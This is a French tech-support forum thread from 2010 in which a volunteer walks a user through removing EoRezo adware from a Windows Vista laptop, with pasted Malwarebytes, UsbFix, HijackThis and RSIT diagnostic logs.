S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]
S3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]

-----------------EOF-----------------

Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882

20/02/2010 22:14:00
mbam-log-2010-02-20 (22-12-53).txt

Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 310740
Temps écoulé: 1 hour(s), 24 minute(s), 2 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 1
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 2

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\EoRezo (Rogue.Eorezo) -> No action taken.

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
C:\ProgramData\32868532 (Rogue.Multiple) -> No action taken.

Fichier(s) infecté(s):
C:\Users\maman\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken.
C:\Users\maman\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken.

philae
 Posté le 20/02/2010 à 22:40 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Grande Maîtresse astucienne

bonsoir,

eliot je prends le relais

chimere06200

ton pc est bien infecté

* Télécharge et installe UsbFix (de C_XX & Chiquitine29) sur ton Bureau :
* Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) suceptible d avoir été infectés sans les ouvrir
*
Fais un clic droit sur le raccourci UsbFix présent sur ton bureau et choisi éxécuter en tant qu'administrateur .
* Choisis l option 1 ( Recherche )
* Laisse travailler l outil.
* Ensuite post le rapport UsbFix.txt qui apparaitra.

Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque. ( C:\UsbFix.txt )
Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus
(AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool
Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...)
d'où l'alerte émise par ces antivirus.

ensuite

* Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) suceptible d avoir été infectés sans les ouvrir
*
Double clic sur le raccourci UsbFix présent sur ton bureau
* choisis l option 2 ( Suppression )
* Ton bureau disparaitra et le pc redémarrera .
* Au redémarrage , UsbFix scannera ton pc , laisse travailler l outil.
* Ensuite post le rapport UsbFix.txt qui apparaitra avec le bureau .

Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque.( C:\UsbFix.txt ) ( CTRL+A Pour tout selectionner , CTRL+C pour copier et CTRL+V pour coller )

ensuite

* relance Malwarebyte's pour un SCAN COMPLET et supprime tout ce qu'il peut encore trouver. Poste le rapport ainsi qu'un nouveau rapport RSIT

chimere06200
 Posté le 20/02/2010 à 23:29 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

Voici la suite ....


############################## | UsbFix V6.097 |

User : maman (Administrateurs) # FREDERIC
Update on 20/02/2010 by El Desaparecido , C_XX & Chimay8
Start at: 23:14:17 | 20/02/2010
Website : http://pagesperso-orange.fr/NosTools/index.html
Contact : FindyKill.Contact@gmail.com

AMD Athlon(tm) 64 X2 Dual-Core Processor TK-55
Microsoft® Windows Vista™ Édition Familiale Premium (6.0.6002 32-bit) # Service Pack 2
Internet Explorer 8.0.6001.18882
Windows Firewall Status : Disabled
AV : Norton Internet Security 2007 [ (!) Disabled | (!) Outdated ]
FW : Norton Internet Security[ (!) Disabled ]2007

C:\ -> Disque fixe local # 141,35 Go (86,31 Go free) # NTFS
D:\ -> Disque fixe local # 7,7 Go (2,21 Go free) [HP_RECOVERY] # NTFS
E:\ -> Disque CD-ROM
F:\ -> Disque amovible # 983,72 Mo (359,67 Mo free) # FAT

############################## | Processus actifs |

C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\runonce.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Windows\System32\svchost.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
C:\Windows\system32\WUDFHost.exe
C:\Windows\system32\wbem\wmiprvse.exe

################## | Elements infectieux |

Supprimé ! C:\Users\maman\AppData\Local\Temp\Setup.exe
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-500
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501
Supprimé ! C:\$Recycle.Bin\S-1-5-21-2071026311-1957086265-568470311-500
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501

################## | Registre |

Supprimé ! [HKLM\software\microsoft\shared tools\msconfig\startupreg\CTFMON]

################## | Mountpoints2 |

Supprimé ! HKCU\...\Explorer\MountPoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}\Shell\Auto\Command
Supprimé ! HKCU\...\Explorer\MountPoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}\Shell\AutoRun\Command

################## | Listing des fichiers présent |

[21/08/2007 23:07|--a------|74] C:\autoexec.bat
[11/04/2009 07:36|-rahs----|333257] C:\bootmgr
[18/09/2006 22:43|--a------|10] C:\config.sys
[05/08/2008 16:22|--a------|477] C:\dkab.log
[19/01/2008 21:32|-rahs----|0] C:\IO.SYS
[19/01/2008 21:32|-rahs----|0] C:\MSDOS.SYS
[?|?|?] C:\pagefile.sys
[15/03/2009 17:25|--a------|200820] C:\UpdatedResults.cst
[20/02/2010 23:17|--a------|3662] C:\UsbFix.txt
[11/09/2005 16:18|---hs----|340] D:\AUTOMODE
[22/12/2007 21:52|---hs----|13] D:\BLOCK.RIN
[04/10/2006 00:02|---hs----|438328] D:\bootmgr
[03/11/2006 20:43|---hs----|117] D:\Desktop.ini
[10/09/2002 17:14|---hs----|8134] D:\Folder.htt
[30/11/2007 00:24|---hs----|698] D:\MASTER.LOG
[03/11/2005 16:19|---hs----|181736] D:\protect.ed
[30/11/2007 00:24|---hs----|0] D:\USER
[18/01/2010 10:44|--a------|26058] F:\RIBS.pdf
[12/01/2010 15:54|--a------|3044469] F:\AUDA_VELOSO.pdf
[20/02/2010 23:12|--a------|1624] F:\BOOTEX.LOG

################## | Vaccination |

# C:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# D:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# F:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).

################## | Upload |

Veuillez envoyer le fichier : C:\UsbFix_Upload_Me_FREDERIC.zip : http://chiquitine.changelog.fr/Sample/Upload.php
Merci pour votre contribution .

################## | ! Fin du rapport # UsbFix V6.097 ! |

merci pour votre patience

philae
 Posté le 20/02/2010 à 23:36 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Grande Maîtresse astucienne

ok pour USBFix maintenant tu fais la suite

* relance Malwarebyte's pour un SCAN COMPLET et supprime tout ce qu'il peut encore trouver. Poste le rapport ainsi qu'un nouveau rapport RSIT


chimere06200
 Posté le 20/02/2010 à 23:54 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

ok pour l'instant ça mouline

philae
 Posté le 21/02/2010 à 00:30 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Grande Maîtresse astucienne

alors laisse le mouliner tranquille.........LOL

demain je ne passerais sûrement pas avant milieu voir fin après midi

Publicité
chimere06200
 Posté le 21/02/2010 à 00:59 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

scan complet :

Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882

21/02/2010 00:52:13
mbam-log-2010-02-21 (00-52-13).txt

Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 309642
Temps écoulé: 1 hour(s), 18 minute(s), 35 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
(Aucun élément nuisible détecté)

Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-21 00:59:50
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 88 GB (61%) free of 145 GB
Total RAM: 2046 MB (53% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 01:00:11, on 21/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\explorer.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\notepad.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe
C:\Windows\system32\msfeedssync.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 7999 bytes

======Scheduled tasks folder======

C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
